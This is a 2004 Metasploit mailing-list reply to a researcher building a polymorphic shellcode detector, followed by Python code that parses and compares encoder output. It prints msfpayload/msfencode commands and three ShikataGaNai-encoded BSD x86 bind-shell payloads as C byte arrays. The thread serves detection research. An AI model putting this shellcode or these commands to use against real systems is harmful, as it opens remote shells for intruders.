Metasploit mailing list archives

dump exploit


From: mmiller at hick.org (mmiller at hick.org)
Date: Thu, 7 Oct 2004 09:48:51 -0500

On Thu, Oct 07, 2004 at 01:47:55PM +0200, pteufl at sbox.tugraz.at wrote:
> Hi all,
> I have just read the documentation of the framework and played around with it.
> I have a question concerning execution of the exploit. When the exploit is ready
> (encoder, payload, exploit are set) the command "exploit" is used to execute the
> exploit. Is there a way to dump the complete exploit to a file: e.g. as a C
> array, or as a binary file?
> The reason for asking: I am just developing a polymorphic shellcode detection
> engine. I have already tested it with ADMmutate, Clet and JempiScodes. It would
> be interesting how it performs on exploits generated by the framework. The
> easiest way to do this would be to dump the exploit code to a file, which then
> could be used as input for the engine.

If the only thing you are interested in is the payload and not the
actual exploit itself you can use 'msfpayload' and 'msfencode' on the command 
line to encode a payload with the various encoders that are included in MSF.

$ ./msfpayload bsdix86_bind R | ./msfencode -e ShikataGaNai -t c
[*] Using Msf::Encoder::ShikataGaNai with final size of 117 bytes
"\xda\xdf\x31\xc9\xbe\xe8\x7b\xae\xb7\xb1\x18\xd9\x74\x24\xf4\x5b"
"\x31\x73\x17\x03\x73\x17\x83\x2b\x7f\x4c\x42\xc3\x80\x97\xad\xd0"
"\x39\x0d\xad\xd6\x39\xab\xfe\x5f\xde\xfa\x37\xa8\xc0\xad\x87\x06"
"\x43\x1e\xb8\xc7\xbc\x49\xe9\x6f\x53\x74\x1b\x33\xda\x9b\x71\xdb"
"\x8f\x0b\xec\xb3\x77\x53\x27\x1d\xde\x1b\xa2\x5e\x09\x0a\x62\xf6"
"\x06\xb3\x7b\x21\xef\x0a\x32\xcf\x40\xc8\x64\x99\x5f\x3a\xcf\x5c"
"\x57\x97\xb8\xb1\xb8\x6b\x51\xa5\xe9\xe9\xc8\x5b\x7f\x0e\x58\xf7"
"\x2c\x61\x66\x08\x05";
$ ./msfpayload bsdix86_bind R | ./msfencode -e ShikataGaNai -t c
[*] Using Msf::Encoder::ShikataGaNai with final size of 117 bytes
"\xd9\xca\xd9\x74\x24\xf4\xbf\x73\x19\xfa\xd8\x5e\x33\xc9\xb1\x18"
"\x31\x7e\x17\x03\x7e\x17\x83\xb5\x1d\x18\x2d\x51\x1e\xdb\xce\x62"
"\xa6\x79\xce\x64\xd7\xe4\x9f\xed\x30\x27\xe9\x1a\x5f\x18\xa9\xb4"
"\xe0\xc9\x99\x55\x1e\x3e\x88\xfd\xf0\xc3\x3a\xa1\x79\x20\x56\x49"
"\x29\xf7\xcd\x01\x95\x08\xc6\x8f\x73\x47\x83\xd0\xab\xf6\x05\x78"
"\xe4\xe7\x5a\x53\x8d\xde\x14\x59\x3e\x84\x07\x0b\xc1\xee\xe1\xca"
"\xca\x43\x9a\x03\x1a\x17\x32\x33\x4b\xb5\xab\xad\x1a\xda\x7e\x65"
"\x4e\xad\x44\x7a\xa7";
$ ./msfpayload bsdix86_bind R | ./msfencode -e ShikataGaNai -t c
[*] Using Msf::Encoder::ShikataGaNai with final size of 117 bytes
"\xbf\x23\xad\x82\xf0\x29\xc9\xdb\xc1\xd9\x74\x24\xf4\xb1\x18\x58"
"\x83\xe8\xfc\x31\x78\x0c\x03\x5b\xa1\x60\x05\xf3\xb9\x63\xe6\xc0"
"\x02\xf1\xe6\xc6\x72\x9f\xb7\x4f\x95\xae\xfe\xb8\xbb\x81\x40\x16"
"\x7c\x72\xf1\xf7\x83\xa5\xa0\x9f\x6b\x48\x52\x03\x05\xaf\x3e\xab"
"\x46\x60\xd5\xa3\x30\x7f\xfe\x6d\x97\xcf\x6b\x6e\xc0\x61\x3d\xc6"
"\x5f\x9f\x42\x31\x16\x66\x0d\xbf\x99\x3d\x3f\xe9\x26\x16\xf6\x6c"
"\x2e\xcb\x61\xa1\xff\x9f\x19\xd5\xd0\x3d\xb3\x4b\xa6\x21\x11\xc7"
"\xeb\x15\xad\x18\xdc";

As far as dumping an entire exploit to a C file, there's no real way to do
that (Yes...perlcc is not considered a 'real' way).
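The dump-to-file step the question asks about, plus the comparison that makes the three runs above useful input for a detection engine, as an added example (Python; not code from this thread or from the framework): it parses `msfencode -t c` output into raw bytes, writes them out, and reports how much two encodings of the same payload still have in common. The sample input is the first 48 bytes of the first two runs in the reply, with the status line changed to declare 48 bytes so the size check passes.

```python
import re

# Sample input: the first 48 bytes of the first two msfencode runs in the reply,
# with the "[*]" status line rewritten to declare 48 bytes (truncated on purpose).
RUN_1 = r'''[*] Using Msf::Encoder::ShikataGaNai with final size of 48 bytes
"\xda\xdf\x31\xc9\xbe\xe8\x7b\xae\xb7\xb1\x18\xd9\x74\x24\xf4\x5b"
"\x31\x73\x17\x03\x73\x17\x83\x2b\x7f\x4c\x42\xc3\x80\x97\xad\xd0"
"\x39\x0d\xad\xd6\x39\xab\xfe\x5f\xde\xfa\x37\xa8\xc0\xad\x87\x06";
'''
RUN_2 = r'''[*] Using Msf::Encoder::ShikataGaNai with final size of 48 bytes
"\xd9\xca\xd9\x74\x24\xf4\xbf\x73\x19\xfa\xd8\x5e\x33\xc9\xb1\x18"
"\x31\x7e\x17\x03\x7e\x17\x83\xb5\x1d\x18\x2d\x51\x1e\xdb\xce\x62"
"\xa6\x79\xce\x64\xd7\xe4\x9f\xed\x30\x27\xe9\x1a\x5f\x18\xa9\xb4";
'''

def parse_msfencode_c(text):
    """Turn `msfencode -t c` output into raw bytes. "[*]" lines are status
    output, not payload; the declared size is checked against what was parsed."""
    declared, hexes = None, []
    for line in text.splitlines():
        m = re.search(r"final size of (\d+) bytes", line)
        if m:
            declared = int(m.group(1))
            continue
        hexes.extend(re.findall(r"\\x([0-9a-fA-F]{2})", line))
    data = bytes(int(h, 16) for h in hexes)
    if declared is not None and declared != len(data):
        raise ValueError(f"declared {declared} bytes, parsed {len(data)}")
    return data

def save_raw(data, path):
    """Write the bytes out as the binary file the question asked for."""
    with open(path, "wb") as fh:
        return fh.write(data)

def matching_positions(a, b):
    """Number of offsets at which two encodings carry the same byte."""
    return sum(x == y for x, y in zip(a, b))

def longest_common_run(a, b):
    """Longest byte string present in both encodings: what a static signature could still match."""
    best = b""
    for i in range(len(a)):
        for j in range(len(a), i + len(best), -1):  # longer candidates only
            if a[i:j] in b:
                best = a[i:j]
                break
    return best
```

Run it on the full 117-byte outputs to see how few offsets agree between runs while the short invariant decoder fragment survives every run.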
